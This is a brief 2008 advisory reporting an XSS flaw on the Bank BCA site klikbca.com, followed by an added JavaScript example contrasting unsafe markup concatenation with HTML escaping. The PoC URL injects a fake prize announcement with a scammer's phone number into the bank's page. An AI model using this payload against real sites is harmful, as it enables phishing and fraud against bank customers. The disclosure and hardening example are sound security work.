Bank BCA Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved



klikbca.com XSSED by SPYRO KiD

POC:

http://www.klikbca.com/GebyarBCA2006/pemenangGebyarBCAfalse3.html?mMsg=%3Ch1%3ESELAMAT%20KEPADA%20KORBAN%20XSS%3C/h1%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EAnda%20memenangkan%20hadiah%20berupa%20blablabla..%3Cbr%3Euntuk%20informasi%20lebih%20lanjut%20mengenai%20prosedur%20pengambilan%20hadiah,%20Hubungi:%201234567890%20(nomor%20penipu)%3Cbr%3E%3Ccenter%3E%3Chr%3Ewww.spyrozone.net%3Chr%3E%3Cbr%3E%3C/td%3E%3C/tr%3E
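
Added example, not part of the original advisory and not BCA's code: it shows why the mMsg value in the PoC above ends up as markup, next to an output-encoded version that renders it as inert text. It assumes the page inserts the decoded mMsg parameter into a table cell; the function names and the table wrapper are hypothetical, and the sample URL carries only the first part of the PoC query.

```javascript
// Added example. Assumption: the page places the decoded mMsg value in a table cell.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can change HTML structure or attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Extract and percent-decode the mMsg parameter; returns "" when it is absent.
function getMsg(url) {
  return new URL(url).searchParams.get("mMsg") ?? "";
}

// Vulnerable pattern (assumed): the decoded value is concatenated into markup,
// so tags in the parameter become elements and can close the surrounding cell and row.
function renderUnsafe(url) {
  return "<table><tr><td>" + getMsg(url) + "</td></tr></table>";
}

// Hardened pattern: the same value is HTML-encoded before it reaches the markup,
// so the browser displays it as literal text inside the original cell.
function renderSafe(url) {
  return "<table><tr><td>" + escapeHtml(getMsg(url)) + "</td></tr></table>";
}

// Count element tags in a string, to compare the structure of both outputs.
function countTags(html) {
  return (html.match(/<\/?[a-z][a-z0-9]*\b[^>]*>/gi) || []).length;
}

// First part of the PoC query from this page (heading plus the closing </td></tr>).
const SAMPLE_URL =
  "http://www.klikbca.com/GebyarBCA2006/pemenangGebyarBCAfalse3.html" +
  "?mMsg=%3Ch1%3ESELAMAT%20KEPADA%20KORBAN%20XSS%3C/h1%3E%3C/td%3E%3C/tr%3E";

console.log("unsafe:", renderUnsafe(SAMPLE_URL), "tags:", countTags(renderUnsafe(SAMPLE_URL)));
console.log("safe:  ", renderSafe(SAMPLE_URL), "tags:", countTags(renderSafe(SAMPLE_URL)));
```

In the unsafe output the injected heading and the extra closing tags are part of the table structure; in the safe output only the six tags of the wrapper remain.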


//E.O.F